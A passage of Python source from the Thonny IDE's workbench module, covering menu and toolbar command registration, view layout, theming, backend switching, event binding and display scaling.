self.add_command(
"toggle_maximize_view",
"view",
tr("Full screen"),
self._cmd_toggle_full_screen,
flag_name="view.full_screen",
default_sequence=select_sequence("<F11>", "<Command-Shift-F>"),
group=80,
)
if self.in_simple_mode():
self.add_command(
"font",
"tools",
tr("Change font size"),
caption=tr("Zoom"),
handler=self._toggle_font_size,
image="zoom",
include_in_toolbar=True,
)
self.add_command(
"quit",
"help",
tr("Exit Thonny"),
self._on_close,
image="quit",
caption=tr("Quit"),
include_in_toolbar=True,
group=101,
)
self.add_command(
"SupportUkraine",
"help",
tr("Support Ukraine"),
self._support_ukraine,
image="Ukraine",
caption=tr("Support"),
include_in_toolbar=True,
group=101,
)
if thonny.in_debug_mode():
self.bind_all("<Control-Shift-Alt-D>", self._print_state_for_debugging, True)
def _print_state_for_debugging(self, event) -> None:
print(get_runner()._postponed_commands)
def _init_containers(self) -> None:
margin = 10
# Main frame functions as
# - a background behind padding of main_pw, without this OS X leaves white border
# - a container to be hidden, when a view is maximized and restored when view is back home
main_frame = ttk.Frame(self) #
self._main_frame = main_frame
main_frame.grid(row=1, column=0, sticky=tk.NSEW)
self.columnconfigure(0, weight=1)
self.rowconfigure(1, weight=1)
self._maximized_view = None # type: Optional[tk.Widget]
self._toolbar = ttk.Frame(main_frame, padding=0)
self._toolbar.grid(column=0, row=0, sticky=tk.NSEW, padx=margin, pady=(5, 0))
self.set_default("layout.west_pw_width", self.scale(150))
self.set_default("layout.east_pw_width", self.scale(150))
self.set_default("layout.s_nb_height", self.scale(150))
self.set_default("layout.nw_nb_height", self.scale(150))
self.set_default("layout.sw_nb_height", self.scale(150))
self.set_default("layout.ne_nb_height", self.scale(150))
self.set_default("layout.se_nb_height", self.scale(150))
self._main_pw = AutomaticPanedWindow(main_frame, orient=tk.HORIZONTAL)
self._main_pw.grid(column=0, row=1, sticky=tk.NSEW, padx=margin, pady=(margin, 0))
main_frame.columnconfigure(0, weight=1)
main_frame.rowconfigure(1, weight=1)
self._west_pw = AutomaticPanedWindow(
self._main_pw,
1,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.west_pw_width"),
)
self._center_pw = AutomaticPanedWindow(self._main_pw, 2, orient=tk.VERTICAL)
self._east_pw = AutomaticPanedWindow(
self._main_pw,
3,
orient=tk.VERTICAL,
preferred_size_in_pw=self.get_option("layout.east_pw_width"),
)
self._view_notebooks = {
"nw": AutomaticNotebook(
self._west_pw, 1, preferred_size_in_pw=self.get_option("layout.nw_nb_height")
),
"w": AutomaticNotebook(self._west_pw, 2),
"sw": AutomaticNotebook(
self._west_pw, 3, preferred_size_in_pw=self.get_option("layout.sw_nb_height")
),
"s": AutomaticNotebook(
self._center_pw, 3, preferred_size_in_pw=self.get_option("layout.s_nb_height")
),
"ne": AutomaticNotebook(
self._east_pw, 1, preferred_size_in_pw=self.get_option("layout.ne_nb_height")
),
"e": AutomaticNotebook(self._east_pw, 2),
"se": AutomaticNotebook(
self._east_pw, 3, preferred_size_in_pw=self.get_option("layout.se_nb_height")
),
}
for nb_name in self._view_notebooks:
self.set_default("layout.notebook_" + nb_name + "_visible_view", None)
self._editor_notebook = EditorNotebook(self._center_pw)
self._editor_notebook.position_key = 1
self._center_pw.insert("auto", self._editor_notebook)
self._statusbar = ttk.Frame(main_frame)
self._statusbar.grid(column=0, row=2, sticky="nsew", padx=margin, pady=(0))
self._statusbar.columnconfigure(2, weight=2)
self._status_label = ttk.Label(self._statusbar, text="")
self._status_label.grid(row=1, column=1, sticky="w")
# self._init_support_ukraine_bar()
self._init_backend_switcher()
def _init_support_ukraine_bar(self) -> None:
ukraine_label = create_action_label(
self._statusbar,
tr("Support Ukraine"),
self._support_ukraine,
# image=self.get_image("Ukraine"),
# compound="left"
)
ukraine_label.grid(row=1, column=1, sticky="wsn")
def _support_ukraine(self, event=None) -> None:
webbrowser.open("https://github.com/thonny/thonny/wiki/Support-Ukraine")
def _init_backend_switcher(self):
# Set up the menu
self._backend_conf_variable = tk.StringVar(value="{}")
if running_on_mac_os():
menu_conf = {}
else:
menu_conf = get_style_configuration("Menu")
self._backend_menu = tk.Menu(self._statusbar, tearoff=False, **menu_conf)
# Set up the button
self._backend_button = ttk.Button(self._statusbar, text="☰", style="Toolbutton")
self._backend_button.grid(row=1, column=3, sticky="nes")
self._backend_button.configure(command=self._post_backend_menu)
def _post_backend_menu(self):
menu_font = tk_font.nametofont("TkMenuFont")
def choose_backend():
backend_conf = ast.literal_eval(self._backend_conf_variable.get())
assert isinstance(backend_conf, dict), "backend conf is %r" % backend_conf
for name, value in backend_conf.items():
self.set_option(name, value)
get_runner().restart_backend(False)
self._backend_menu.delete(0, "end")
max_description_width = 0
button_text_width = menu_font.measure(self._backend_button.cget("text"))
num_entries = 0
added_micropython_separator = False
for backend in sorted(self.get_backends().values(), key=lambda x: x.sort_key):
entries = backend.proxy_class.get_switcher_entries()
for conf, label in entries:
if not added_micropython_separator and "MicroPython" in label:
self._backend_menu.add_separator()
added_micropython_separator = True
self._backend_menu.add_radiobutton(
label=label,
command=choose_backend,
variable=self._backend_conf_variable,
value=repr(conf),
)
max_description_width = max(menu_font.measure(label), max_description_width)
num_entries += 1
# self._backend_conf_variable.set(value=self.get_option("run.backend_name"))
self._backend_menu.add_separator()
self._backend_menu.add_command(
label=tr("Configure interpreter..."),
command=lambda: self.show_options("interpreter"),
)
post_x = self._backend_button.winfo_rootx()
post_y = (
self._backend_button.winfo_rooty()
- self._backend_menu.yposition("end")
- self._backend_menu.yposition(1)
)
if self.winfo_screenwidth() / self.winfo_screenheight() > 2:
# Most likely several monitors.
# Tk will adjust x properly with single monitor, but when Thonny is maximized
# on a monitor, which has another monitor to its right, the menu can be partially
# displayed on another monitor (at least in Ubuntu).
width_diff = max_description_width - button_text_width
post_x -= width_diff + menu_font.measure("mmm")
try:
self._backend_menu.tk_popup(post_x, post_y)
except tk.TclError as e:
if 'unknown option "-state"' not in str(e):
logger.warning("Problem with switcher popup", exc_info=e)
def _on_backend_restart(self, event):
proxy = get_runner().get_backend_proxy()
if proxy:
conf = proxy.get_current_switcher_configuration()
desc = proxy.get_switcher_configuration_label(conf)
value = repr(conf)
else:
desc = "<no backend>"
value = "n/a"
self._backend_conf_variable.set(value=value)
self._backend_button.configure(text=desc + " ☰")
def _init_theming(self) -> None:
self._style = ttk.Style()
self._ui_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleUiThemeSettings, Dict[str, str]]] # value is (parent, settings, images)
self._syntax_themes = (
{}
) # type: Dict[str, Tuple[Optional[str], FlexibleSyntaxThemeSettings]] # value is (parent, settings)
self.set_default("view.ui_theme", self.get_default_ui_theme())
def add_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]] = None,
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences=False,
) -> None:
"""Registers an item to be shown in specified menu.
Args:
menu_name: Name of the menu the command should appear in.
Standard menu names are "file", "edit", "run", "view", "help".
If a menu with the given name doesn't exist, then a new menu is created
(with label=name).
command_label: Label for this command
handler: Function to be called when the command is invoked.
Should be callable with one argument (the event or None).
tester: Function to be called for determining if command is available or not.
Should be callable with one argument (the event or None).
Should return True or False.
If None then command is assumed to be always available.
default_sequence: Default shortcut (Tk style)
flag_name: Used for toggle commands. Indicates the name of the boolean option.
group: Used for grouping related commands together. Value should be int.
Groups with smaller numbers appear first.
Returns:
None
"""
# Temporary solution for plug-ins made for versions before 3.2
if menu_name == "device":
menu_name = "tools"
group = 150
# store command to be published later
self._commands.append(
dict(
command_id=command_id,
menu_name=menu_name,
command_label=command_label,
handler=handler,
tester=tester,
default_sequence=default_sequence,
extra_sequences=extra_sequences,
flag_name=flag_name,
skip_sequence_binding=skip_sequence_binding,
accelerator=accelerator,
group=group,
position_in_group=position_in_group,
image=image,
caption=caption,
alternative_caption=alternative_caption,
include_in_menu=include_in_menu,
include_in_toolbar=include_in_toolbar,
submenu=submenu,
bell_when_denied=bell_when_denied,
show_extra_sequences=show_extra_sequences,
)
)
def _publish_commands(self) -> None:
for cmd in self._commands:
self._publish_command(**cmd)
def _publish_command(
self,
command_id: str,
menu_name: str,
command_label: str,
handler: Optional[Callable[[], None]],
tester: Optional[Callable[[], bool]] = None,
default_sequence: Optional[str] = None,
extra_sequences: Sequence[str] = [],
flag_name: Optional[str] = None,
skip_sequence_binding: bool = False,
accelerator: Optional[str] = None,
group: int = 99,
position_in_group="end",
image: Optional[str] = None,
caption: Optional[str] = None,
alternative_caption: Optional[str] = None,
include_in_menu: bool = True,
include_in_toolbar: bool = False,
submenu: Optional[tk.Menu] = None,
bell_when_denied: bool = True,
show_extra_sequences: bool = False,
) -> None:
def dispatch(event=None):
if not tester or tester():
denied = False
handler()
else:
denied = True
logger.debug("Command '" + command_id + "' execution denied")
if bell_when_denied:
self.bell()
self.event_generate("UICommandDispatched", command_id=command_id, denied=denied)
def dispatch_if_caps_lock_is_on(event):
if caps_lock_is_on(event) and not shift_is_pressed(event):
dispatch(event)
sequence_option_name = "shortcuts." + command_id
self.set_default(sequence_option_name, default_sequence)
sequence = self.get_option(sequence_option_name)
if sequence:
if not skip_sequence_binding:
self.bind_all(sequence, dispatch, True)
# work around caps-lock problem
# https://github.com/thonny/thonny/issues/1347
# Unfortunately the solution doesn't work with sequences involving Shift
# (in Linux with the expected solution Shift sequences did not come through
# with Caps Lock, and in Windows, the shift handlers started to react
# to non-shift keypresses)
# Python 3.7 on Mac seems to require lower letters for shift sequences.
parts = sequence.strip("<>").split("-")
if len(parts[-1]) == 1 and parts[-1].islower() and "Shift" not in parts:
lock_sequence = "<%s-Lock-%s>" % ("-".join(parts[:-1]), parts[-1].upper())
self.bind_all(lock_sequence, dispatch_if_caps_lock_is_on, True)
# register shortcut even without binding
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
for extra_sequence in extra_sequences:
self.bind_all(extra_sequence, dispatch, True)
if "greek_" not in extra_sequence.lower() or running_on_linux():
# Use greek alternatives only on Linux
# (they are not required on Mac
# and cause double events on Windows)
register_latin_shortcut(self._latin_shortcuts, sequence, handler, tester)
menu = self.get_menu(menu_name)
if image:
_image = self.get_image(image) # type: Optional[tk.PhotoImage]
_disabled_image = self.get_image(image, disabled=True)
else:
_image = None
_disabled_image = None
if not accelerator and sequence:
accelerator = sequence_to_accelerator(sequence)
"""
# Does not work on Mac
if show_extra_sequences:
for extra_seq in extra_sequences:
accelerator += " or " + sequence_to_accelerator(extra_seq)
"""
if include_in_menu:
def dispatch_from_menu():
# I don't like that Tk menu toggles checkbutton variable
# automatically before calling the handler.
# So I revert the toggle before calling the actual handler.
# This way the handler doesn't have to worry whether it
# needs to toggle the variable or not, and it can choose to
# decline the toggle.
if flag_name is not None:
var = self.get_variable(flag_name)
var.set(not var.get())
dispatch(None)
if _image and lookup_style_option("OPTIONS", "icons_in_menus", True):
menu_image = _image # type: Optional[tk.PhotoImage]
elif flag_name:
# no image or blank next to a checkbox
menu_image = None
else:
menu_image = self.get_image("16x16-blank")
# remember the details that can't be stored in Tkinter objects
self._menu_item_specs[(menu_name, command_label)] = MenuItem(
group, position_in_group, tester
)
menu.insert(
self._find_location_for_menu_item(menu_name, command_label),
"checkbutton" if flag_name else "cascade" if submenu else "command",
label=command_label,
accelerator=accelerator,
image=menu_image,
compound=tk.LEFT,
variable=self.get_variable(flag_name) if flag_name else None,
command=dispatch_from_menu if handler else None,
menu=submenu,
)
if include_in_toolbar:
toolbar_group = self._get_menu_index(menu) * 100 + group
assert caption is not None
self._add_toolbar_button(
command_id,
_image,
_disabled_image,
command_label,
caption,
caption if alternative_caption is None else alternative_caption,
accelerator,
handler,
tester,
toolbar_group,
)
def add_view(
self,
cls: Type[tk.Widget],
label: str,
default_location: str,
visible_by_default: bool = False,
default_position_key: Optional[str] = None,
) -> None:
"""Adds item to "View" menu for showing/hiding given view.
Args:
cls: Class or constructor for the view. Should be callable with a single
argument (the master of the view)
label: Label of the view tab
default_location: Location descriptor. Can be "nw", "sw", "s", "se", "ne"
Returns: None
"""
view_id = cls.__name__
if default_position_key is None:
default_position_key = label
self.set_default("view." + view_id + ".visible", visible_by_default)
self.set_default("view." + view_id + ".location", default_location)
self.set_default("view." + view_id + ".position_key", default_position_key)
if self.in_simple_mode():
visibility_flag = tk.BooleanVar(value=view_id in SIMPLE_MODE_VIEWS)
else:
visibility_flag = cast(tk.BooleanVar, self.get_variable("view." + view_id + ".visible"))
self._view_records[view_id] = {
"class": cls,
"label": label,
"location": self.get_option("view." + view_id + ".location"),
"position_key": self.get_option("view." + view_id + ".position_key"),
"visibility_flag": visibility_flag,
}
# handler
def toggle_view_visibility():
if visibility_flag.get():
self.hide_view(view_id)
else:
self.show_view(view_id, True)
self.add_command(
"toggle_" + view_id,
menu_name="view",
command_label=label,
handler=toggle_view_visibility,
flag_name="view." + view_id + ".visible",
group=10,
position_in_group="alphabetic",
)
def add_configuration_page(
self, key: str, title: str, page_class: Type[tk.Widget], order: int
) -> None:
self._configuration_pages.append((key, title, page_class, order))
def add_content_inspector(self, inspector_class: Type) -> None:
self.content_inspector_classes.append(inspector_class)
def add_backend(
self,
name: str,
proxy_class: Type[BackendProxy],
description: str,
config_page_constructor,
sort_key=None,
) -> None:
self._backends[name] = BackendSpec(
name,
proxy_class,
description,
config_page_constructor,
sort_key if sort_key is not None else description,
)
self.set_default(f"{name}.last_configurations", [])
# assign names to related classes
proxy_class.backend_name = name # type: ignore
proxy_class.backend_description = description # type: ignore
config_page_constructor.backend_name = name
def add_ui_theme(
self,
name: str,
parent: Union[str, None],
settings: FlexibleUiThemeSettings,
images: Dict[str, str] = {},
) -> None:
if name in self._ui_themes:
warn(tr("Overwriting theme '%s'") % name)
self._ui_themes[name] = (parent, settings, images)
def add_syntax_theme(
self, name: str, parent: Optional[str], settings: FlexibleSyntaxThemeSettings
) -> None:
if name in self._syntax_themes:
warn(tr("Overwriting theme '%s'") % name)
self._syntax_themes[name] = (parent, settings)
def get_usable_ui_theme_names(self) -> Sequence[str]:
return sorted([name for name in self._ui_themes if self._ui_themes[name][0] is not None])
def get_syntax_theme_names(self) -> Sequence[str]:
return sorted(self._syntax_themes.keys())
def get_ui_mode(self) -> str:
return self._active_ui_mode
def in_simple_mode(self) -> bool:
return self.get_ui_mode() == "simple"
def scale(self, value: Union[int, float]) -> int:
if isinstance(value, (int, float)):
# using int instead of round so that thin lines will stay
# one pixel even with scaling_factor 1.67
result = int(self._scaling_factor * value)
if result == 0 and value > 0:
# don't lose thin lines because of scaling
return 1
else:
return result
else:
raise NotImplementedError("Only numeric dimensions supported at the moment")
def _register_ui_theme_as_tk_theme(self, name: str) -> None:
# collect settings from all ancestors
total_settings = [] # type: List[FlexibleUiThemeSettings]
total_images = {} # type: Dict[str, str]
temp_name = name
while True:
parent, settings, images = self._ui_themes[temp_name]
total_settings.insert(0, settings)
for img_name in images:
total_images.setdefault(img_name, images[img_name])
if parent is not None:
temp_name = parent
else:
# reached start of the chain
break
assert temp_name in self._style.theme_names()
# only root of the ancestors is relevant for theme_create,
# because the method actually doesn't take parent settings into account
# (https://mail.python.org/pipermail/tkinter-discuss/2015-August/003752.html)
self._style.theme_create(name, temp_name)
self._image_mapping_by_theme[name] = total_images
# load images
self.get_image("tab-close", "img_close")
self.get_image("tab-close-active", "img_close_active")
# apply settings starting from root ancestor
for settings in total_settings:
if callable(settings):
settings = settings()
if isinstance(settings, dict):
self._style.theme_settings(name, settings)
else:
for subsettings in settings:
self._style.theme_settings(name, subsettings)
def _apply_ui_theme(self, name: str) -> None:
self._current_theme_name = name
if name not in self._style.theme_names():
self._register_ui_theme_as_tk_theme(name)
self._style.theme_use(name)
# https://wiki.tcl.tk/37973#pagetocfe8b22ab
for setting in ["background", "foreground", "selectBackground", "selectForeground"]:
value = self._style.lookup("Listbox", setting)
if value:
self.option_add("*TCombobox*Listbox." + setting, value)
self.option_add("*Listbox." + setting, value)
text_opts = self._style.configure("Text")
if text_opts:
for key in text_opts:
self.option_add("*Text." + key, text_opts[key])
if hasattr(self, "_menus"):
# if menus have been initialized, ie. when theme is being changed
for menu in self._menus.values():
menu.configure(get_style_configuration("Menu"))
self.update_fonts()
def _apply_syntax_theme(self, name: str) -> None:
def get_settings(name):
try:
parent, settings = self._syntax_themes[name]
except KeyError:
self.report_exception("Can't find theme '%s'" % name)
return {}
if callable(settings):
settings = settings()
if parent is None:
return settings
else:
result = get_settings(parent)
for key in settings:
if key in result:
result[key].update(settings[key])
else:
result[key] = settings[key]
return result
from thonny import codeview
codeview.set_syntax_options(get_settings(name))
def reload_themes(self) -> None:
ui_theme = self.get_option("view.ui_theme")
available_themes = self.get_usable_ui_theme_names()
if ui_theme not in available_themes:
logger.warning("Could not find UI theme %r, switching to default", ui_theme)
ui_theme = self.get_default_ui_theme()
self.set_option("view.ui_theme", ui_theme)
self._apply_ui_theme(ui_theme)
syntax_theme = self.get_option("view.syntax_theme")
if syntax_theme not in self._syntax_themes:
logger.warning("Could not find syntax theme %r, switching to default", syntax_theme)
syntax_theme = self.get_default_syntax_theme()
self.set_option("view.syntax_theme", syntax_theme)
self._apply_syntax_theme(syntax_theme)
def get_default_ui_theme(self) -> str:
available_themes = self.get_usable_ui_theme_names()
if "Windows" in available_themes:
return "Windows"
elif running_on_rpi() and "Raspberry Pi" in available_themes:
return "Raspberry Pi"
elif "Enhanced Clam" in available_themes:
return "Enhanced Clam"
else:
return "clam"
def get_default_syntax_theme(self) -> str:
if self.uses_dark_ui_theme():
return "Default Dark"
else:
return "Default Light"
def uses_dark_ui_theme(self) -> bool:
name = self._style.theme_use()
while True:
if "dark" in name.lower():
return True
try:
name, _, _ = self._ui_themes[name]
except KeyError:
return False
if name is None:
# reached start of the chain
break
return False
def _init_program_arguments_frame(self) -> None:
self.set_default("view.show_program_arguments", False)
self.set_default("run.program_arguments", "")
self.set_default("run.past_program_arguments", [])
visibility_var = self.get_variable("view.show_program_arguments")
content_var = self.get_variable("run.program_arguments")
frame = ttk.Frame(self._toolbar)
col = 1000
self._toolbar.columnconfigure(col, weight=1)
label = ttk.Label(frame, text=tr("Program arguments:"))
label.grid(row=0, column=0, sticky="nse", padx=5)
self.program_arguments_box = ttk.Combobox(
frame,
width=80,
height=15,
textvariable=content_var,
values=[""] + self.get_option("run.past_program_arguments"),
)
self.program_arguments_box.grid(row=0, column=1, sticky="nsew", padx=5)
frame.columnconfigure(1, weight=1)
def update_visibility():
if visibility_var.get():
if not frame.winfo_ismapped():
frame.grid(row=0, column=col, sticky="nse")
else:
if frame.winfo_ismapped():
frame.grid_remove()
def toggle():
visibility_var.set(not visibility_var.get())
update_visibility()
self.add_command(
"viewargs",
"view",
tr("Program arguments"),
toggle,
flag_name="view.show_program_arguments",
group=11,
)
update_visibility()
def _init_regular_mode_link(self):
if self.get_ui_mode() != "simple":
return
label = ttk.Label(
self._toolbar,
text=tr("Switch to\nregular\nmode"),
justify="right",
font="SmallLinkFont",
style="Url.TLabel",
cursor=get_hyperlink_cursor(),
)
label.grid(row=0, column=1001, sticky="ne")
def on_click(event):
self.set_option("general.ui_mode", "regular")
tk.messagebox.showinfo(
tr("Regular mode"),
tr(
"Configuration has been updated. "
+ "Restart Thonny to start working in regular mode.\n\n"
+ "(See 'Tools → Options → General' if you change your mind later.)"
),
master=self,
)
label.bind("<1>", on_click, True)
def _switch_backend_group(self, group):
pass
def _switch_darkness(self, mode):
pass
def _switch_to_regular_mode(self):
pass
def log_program_arguments_string(self, arg_str: str) -> None:
arg_str = arg_str.strip()
self.set_option("run.program_arguments", arg_str)
if arg_str == "":
# empty will be handled differently
return
past_args = self.get_option("run.past_program_arguments")
if arg_str in past_args:
past_args.remove(arg_str)
past_args.insert(0, arg_str)
past_args = past_args[:10]
self.set_option("run.past_program_arguments", past_args)
self.program_arguments_box.configure(values=[""] + past_args)
def _show_views(self) -> None:
for view_id in self._view_records:
if self._view_records[view_id]["visibility_flag"].get():
try:
self.show_view(view_id, False)
except Exception:
self.report_exception("Problem showing " + view_id)
def update_image_mapping(self, mapping: Dict[str, str]) -> None:
"""Was used by thonny-pi. Not recommended anymore"""
self._default_image_mapping.update(mapping)
def get_backends(self) -> Dict[str, BackendSpec]:
return self._backends
def get_option(self, name: str, default=None) -> Any:
# Need to return Any, otherwise each typed call site needs to cast
return self._configuration_manager.get_option(name, default)
def set_option(self, name: str, value: Any) -> None:
self._configuration_manager.set_option(name, value)
def get_local_cwd(self) -> str:
cwd = self.get_option("run.working_directory")
if os.path.exists(cwd):
return normpath_with_actual_case(cwd)
else:
return normpath_with_actual_case(os.path.expanduser("~"))
def set_local_cwd(self, value: str) -> None:
if self.get_option("run.working_directory") != value:
self.set_option("run.working_directory", value)
if value:
self.event_generate("LocalWorkingDirectoryChanged", cwd=value)
def set_default(self, name: str, default_value: Any) -> None:
"""Registers a new option.
If the name contains a period, then the part left of the (first) period
becomes the section of the option and the rest becomes the name under that
section.
If the name doesn't contain a period, then it will be added under section
"general".
"""
self._configuration_manager.set_default(name, default_value)
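# Hedged example (illustration only): set_default("run.working_directory", "~") registers
# option "working_directory" under section "run"; set_default("debug_mode", False) would
# register it under section "general".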
def get_variable(self, name: str) -> tk.Variable:
return self._configuration_manager.get_variable(name)
def get_menu(self, name: str, label: Optional[str] = None) -> tk.Menu:
"""Gives the menu with given name. Creates if not created yet.
Args:
name: meant to be used as a non-translatable menu name
label: translated label, used only when menu with given name doesn't exist yet
"""
# For compatibility with plug-ins
if name in ["device", "tempdevice"] and label is None:
label = tr("Device")
if name not in self._menus:
if running_on_mac_os():
conf = {}
else:
conf = get_style_configuration("Menu")
menu = tk.Menu(self._menubar, **conf)
menu["postcommand"] = lambda: self._update_menu(menu, name)
self._menubar.add_cascade(label=label if label else name, menu=menu)
self._menus[name] = menu
if label:
self._menus[label] = menu
return self._menus[name]
def get_view(self, view_id: str, create: bool = True) -> tk.Widget:
if "instance" not in self._view_records[view_id]:
if not create:
raise RuntimeError("View %s not created" % view_id)
class_ = self._view_records[view_id]["class"]
location = self._view_records[view_id]["location"]
master = self._view_notebooks[location]
# create the view
view = class_(self) # View's master is workbench to allow making it maximized
view.position_key = self._view_records[view_id]["position_key"]
self._view_records[view_id]["instance"] = view
# create the view home_widget to be added into notebook
view.home_widget = ttk.Frame(master)
view.home_widget.columnconfigure(0, weight=1)
view.home_widget.rowconfigure(0, weight=1)
view.home_widget.maximizable_widget = view # type: ignore
view.home_widget.close = lambda: self.hide_view(view_id) # type: ignore
if hasattr(view, "position_key"):
view.home_widget.position_key = view.position_key # type: ignore
# initially the view will be in its home_widget
view.grid(row=0, column=0, sticky=tk.NSEW, in_=view.home_widget)
view.hidden = True
return self._view_records[view_id]["instance"]
def get_editor_notebook(self) -> EditorNotebook:
assert self._editor_notebook is not None
return self._editor_notebook
def get_package_dir(self):
"""Returns thonny package directory"""
return os.path.dirname(sys.modules["thonny"].__file__)
def get_image(
self, filename: str, tk_name: Optional[str] = None, disabled=False
) -> tk.PhotoImage:
if filename in self._image_mapping_by_theme[self._current_theme_name]:
filename = self._image_mapping_by_theme[self._current_theme_name][filename]
if filename in self._default_image_mapping:
filename = self._default_image_mapping[filename]
# if path is relative then interpret it as living in res folder
if not os.path.isabs(filename):
filename = os.path.join(self.get_package_dir(), "res", filename)
if not os.path.exists(filename):
if os.path.exists(filename + ".png"):
filename = filename + ".png"
elif os.path.exists(filename + ".gif"):
filename = filename + ".gif"
if disabled:
filename = os.path.join(
os.path.dirname(filename), "_disabled_" + os.path.basename(filename)
)
if not os.path.exists(filename):
return None
# are there platform-specific variants?
plat_filename = filename[:-4] + "_" + platform.system() + ".png"
if os.path.exists(plat_filename):
filename = plat_filename
treeview_rowheight = self._compute_treeview_rowheight()
threshold = self.get_option("general.large_icon_rowheight_threshold")
if (
treeview_rowheight > threshold
and not filename.endswith("48.png")
or treeview_rowheight > threshold * 1.5
):
scaled_filename = filename[:-4] + "_2x.png"
scaled_filename_alt = filename[:-4] + "48.png" # used in pi theme
if os.path.exists(scaled_filename):
filename = scaled_filename
elif os.path.exists(scaled_filename_alt):
filename = scaled_filename_alt
else:
img = tk.PhotoImage(file=filename)
# can't use zoom method, because this doesn't allow name
img2 = tk.PhotoImage(tk_name)
self.tk.call(
img2,
"copy",
img.name,
"-zoom",
2,
2,
)
self._images.add(img2)
return img2
img = tk.PhotoImage(tk_name, file=filename)
self._images.add(img)
return img
def show_view(self, view_id: str, set_focus: bool = True) -> Union[bool, tk.Widget]:
"""View must be already registered.
Args:
view_id: View class name
without package name (eg. 'ShellView')"""
if view_id == "MainFileBrowser":
# Was renamed in 3.1.1
view_id = "FilesView"
# NB! Don't forget that view.home_widget is added to notebook, not view directly
# get or create
view = self.get_view(view_id)
notebook = view.home_widget.master # type: ignore
if hasattr(view, "before_show") and view.before_show() == False: # type: ignore
return False
if view.hidden: # type: ignore
notebook.insert(
"auto", view.home_widget, text=self._view_records[view_id]["label"] # type: ignore
)
view.hidden = False # type: ignore
if hasattr(view, "on_show"): # type: ignore
view.on_show()
# switch to the tab
notebook.select(view.home_widget) # type: ignore
# add focus
if set_focus:
view.focus_set()
self.set_option("view." + view_id + ".visible", True)
self.event_generate("ShowView", view=view, view_id=view_id)
return view
def hide_view(self, view_id: str) -> Union[bool, None]:
# NB! Don't forget that view.home_widget is added to notebook, not view directly
if "instance" in self._view_records[view_id]:
# TODO: handle the case, when view is maximized
view = self._view_records[view_id]["instance"]
if view.hidden:
return True
if hasattr(view, "before_hide") and view.before_hide() == False:
return False
view.home_widget.master.forget(view.home_widget)
self.set_option("view." + view_id + ".visible", False)
self.event_generate("HideView", view=view, view_id=view_id)
view.hidden = True
return True
def event_generate(self, sequence: str, event: Optional[Record] = None, **kwargs) -> None:
"""Uses custom event handling when sequence doesn't start with <.
In this case arbitrary attributes can be added to the event.
Otherwise forwards the call to Tk's event_generate"""
# pylint: disable=arguments-differ
if sequence.startswith("<"):
assert event is None
tk.Tk.event_generate(self, sequence, **kwargs)
else:
if sequence in self._event_handlers:
if event is None:
event = WorkbenchEvent(sequence, **kwargs)
else:
event.update(kwargs)
# make a copy of handlers, so that event handler can remove itself
# from the registry during iteration
# (or new handlers can be added)
for handler in sorted(self._event_handlers[sequence].copy(), key=str):
try:
handler(event)
except Exception:
self.report_exception("Problem when handling '" + sequence + "'")
if not self._closing:
self._update_toolbar()
def bind(self, sequence: str, func: Callable, add: bool = None) -> None: # type: ignore
"""Uses custom event handling when sequence doesn't start with <.
Otherwise forwards the call to Tk's bind"""
# pylint: disable=signature-differs
if not add:
logger.warning(
"Workbench.bind({}, ..., add={}) -- did you really want to replace existing bindings?".format(
sequence, add
)
)
if sequence.startswith("<"):
tk.Tk.bind(self, sequence, func, add)
else:
if sequence not in self._event_handlers or not add:
self._event_handlers[sequence] = set()
self._event_handlers[sequence].add(func)
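# Hedged illustration (not part of the original file): sequences that don't start with
# "<" go through the custom registry above instead of Tk, so client code could do e.g.
#
#     workbench.bind("BackendRestart", on_restart, True)   # custom WorkbenchEvent
#     workbench.bind("<FocusIn>", on_focus, True)          # forwarded to Tk
#
# where `workbench` is the Workbench instance and `on_restart`/`on_focus` are
# hypothetical handlers taking the event as their single argument.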
def unbind(self, sequence: str, func=None) -> None:
# pylint: disable=arguments-differ
if sequence.startswith("<"):
tk.Tk.unbind(self, sequence, funcid=func)
else:
try:
self._event_handlers[sequence].remove(func)
except Exception:
logger.exception("Can't remove binding for '%s' and '%s'", sequence, func)
def in_heap_mode(self) -> bool:
# TODO: add a separate command for enabling the heap mode
# untie the mode from HeapView
return self._configuration_manager.has_option("view.HeapView.visible") and self.get_option(
"view.HeapView.visible"
)
def in_debug_mode(self) -> bool:
return os.environ.get("THONNY_DEBUG", False) in [
"1",
1,
"True",
True,
"true",
] or self.get_option("general.debug_mode", False)
def _init_scaling(self) -> None:
self._default_scaling_factor = self.tk.call("tk", "scaling")
if self._default_scaling_factor > 10:
# it may be infinity, e.g. in Fedora
self._default_scaling_factor = 1.33
scaling = self.get_option("general.scaling")
if scaling in ["default", "auto"]: # auto was used in 2.2b3
self._scaling_factor = self._default_scaling_factor
else:
self._scaling_factor = float(scaling)
MAC_SCALING_MODIFIER = 1.7
if running_on_mac_os():
self._scaling_factor *= MAC_SCALING_MODIFIER
self.tk.call("tk", "scaling", self._scaling_factor)
font_scaling_mode = self.get_option("general.font_scaling_mode")
if (
running_on_linux()
and font_scaling_mode in ["default", "extra"]
and scaling not in ["default", "auto"]
):
# update system fonts which are given in pixel sizes
for name in tk_font.names():
f = tk_font.nametofont(name)
orig_size = f.cget("size")
# According to the documentation, absolute values of negative font sizes
# should be interpreted as pixel sizes (not affected by "tk scaling")
# and positive values are point sizes, which are supposed to scale automatically
# http://www.tcl.tk/man/tcl8.6/TkCmd/font.htm#M26
# Unfortunately it seems that this cannot be relied on
# https://groups.google.com/forum/#!msg/comp.lang.tcl/ZpL6tq77M4M/GXImiV2INRQJ
# My experiments show that manually changing negative font sizes
# doesn't have any effect -- fonts keep their default size
# (Tested in Raspbian Stretch, Ubuntu 18.04 and Fedora 29)
# On the other hand positive sizes scale well (and they don't scale automatically)
# convert pixel sizes to point_size
if orig_size < 0:
orig_size = -orig_size / self._default_scaling_factor
# scale
scaled_size = round(
orig_size * (self._scaling_factor / self._default_scaling_factor)
)
f.configure(size=scaled_size)
